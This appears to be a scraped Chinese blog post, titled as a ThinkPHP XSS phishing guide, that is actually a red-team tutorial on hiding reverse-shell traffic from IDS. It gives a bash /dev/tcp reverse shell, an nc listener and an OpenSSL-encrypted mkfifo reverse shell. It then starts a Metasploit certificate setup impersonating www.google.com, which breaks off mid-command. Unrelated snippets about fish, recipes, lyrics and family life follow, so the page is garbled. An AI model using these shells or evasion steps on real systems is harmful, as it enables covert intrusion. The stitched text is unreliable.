渗透测试之地基钓鱼篇:thinkphp平台XSS钓鱼
渗透测试-地基篇
该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式 *** ,望大家能共同加油学到东西。
请注意:
本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。
名言:
你对这行的兴趣,决定你在这行的成就!
红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要横行渗透,往往需要反弹 shell,如果反弹 shell 都是明文传输,那么内网里有 IDS 或者防护软件会进行流量进行分析,检测带有攻击特征,很快被发现,如果蓝队对攻击流量回溯分析,就可以复现攻击的过程。
那么蓝队发现红队的行为特征判断后,进行阻断红队行为,红队就无法进行渗透行为了...今天将介绍常用的nc反弹shell、MSF监听反弹shell、Cobalt strike 4.0拿shell,三种方式如何进行流量加密,如何过IDS或者防护软件分析设备和工具的。
此次利用wireshark抓包进行模拟流量分析设备进行演示!!
黑客(攻击者):
IP:192.168.175.145
系统:kali.2020.4
VPS服务器:
此次模拟环境将直接越过VPS平台钓鱼拿到对方的shell过程!!
办公区域:
系统:windwos 2019
IP:192.168.2.142
linux系统:kali.2020.4(模拟linux服务器)
IP:192.168.2.141
目前黑客通过kali系统进行攻击行为,发现漏洞后获得了linux和windows 2019两个办公区域系统的权限,使用了nc反弹shell、MSF生成的shell、Cobalt Strike 4.0生成的shell进行反弹...获得了最终的控制权限,但是办公区域存在IDS等流量监测设备,为了防止被监控,将演示三种不同方式拿反弹shell后如何流量加密,不被IDS等流量监测设备发现!!
Nc(瑞士军刀)它也是一个功能强大的 *** 调试和探测工具,能够建立需要的几乎所有类型的 *** 连接,支持linux和windows环境,红队喜爱工具之一....
这里演示NC正常拿shell情况下,如何被对方流量监控到的....
该图可看到攻击者和被攻击者IP情况...
攻击者开启NC监听本地8888端口!
nc -vlp 8888
被攻击者端开启Wireshark进行流量实时监听分析!
使用Wireshark对eth0进行流量抓包分析,被攻击端执行一句话shell命令:
bash -i>& /dev/tcp/192.168.175.145/8888 0>&1
攻击方利用nc,通过反弹shell方式获得了控制权限...
攻击者进行信息收集命令操作,被攻击者Wireshark一直在监听着!!
这边我们来到被攻击者主机上查看下抓包信息,选择TCP流信息...
可看到未加密的情况下,流量设备是可以查看到攻击者的行为记录的!!!
那么接下来将演示如何进行流量加密!!
OpenSSL进行加密拿shell,和NC的性质是类似的,都是通过/bin/bash获得shell,接下来将用OpenSSL进行演示流量加密!!
在kali上使用OpenSSL生成自签名证书:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
成功生成后,在桌面有两个pem加密文件key!!
openssl s_server -quiet -key key.pem -cert cert.pem -port 8888 #开启监听
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.175.145:8888 > /tmp/s; rm /tmp/s #反弹shell命令
成功通过Key加密获得了控制权限,并执行了相应的控制命令!!行为都被WireShark流量进行监控了!!
通过TCP流查看到的信息都是乱码,经过了加密!
Metasploit在内网做横行渗透时,这些流量很容易就能被检测出来,所以做好流量加密,就能
避免审计工具检测出来,开始演示!
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.
斗鱼怎么养 1、水质和水温:斗鱼对温度的要求并不苛刻,一般20~30℃之内都能成活,水温处于24~27℃时最适宜其生长;水的怎么样酸碱度以中性水为宜,pH值为6.5~7.2;在。 我朋友拜托我养她的斗...
香菇菜谱(香菇的12种做法) 香菇,一种自带香气的菌类,更是有名的“山珍”。它香味很独特,也很浓郁,其中,干香菇要比新鲜的香菇还要香,有“一朵鲜一锅”美誉,比如炖汤时,放一两朵香菇,整锅汤会更鲜...
死了都要爱演唱:信乐团死了都天平的利用要爱不极尽描述不痛快情感多深只有兔唇的原因这样才足够批注死了都要爱不哭到微婉君主题曲笑不痛快宇宙歼灭心还在把天天当成王思聪博客是末日来相爱一分一秒都美到。伟哥...
随着社会的进步,生活条件得到改善以来,涌现出很多美食。餐饮行业乃至整个市场都非常繁荣。那么火锅作为传统的特色美食当然不会落后于其他产品,火锅的市场占有率比一般的美食要多,人们都知道重庆成都火锅出名,但...
★ 现在就帮大家解决7个问题—— 1、微信封号的原则是什么? 2、什么号最容易被封? 3、号被封了,如何安全解封? 4、被永久封号了怎么办? 5、如何避免被系统判定为“账号异常”? 6...
婆媳之间一直全是家中里较为焦虑不安的话题讨论,特别是在妈妈们生了小孩以后,由谁来带娃就更关键了,那麼家婆带娃怎么样,下边的我就产生:家婆带娃的弊端 隔代教育对小孩怎么样。 隔代教育有什么种类 太过...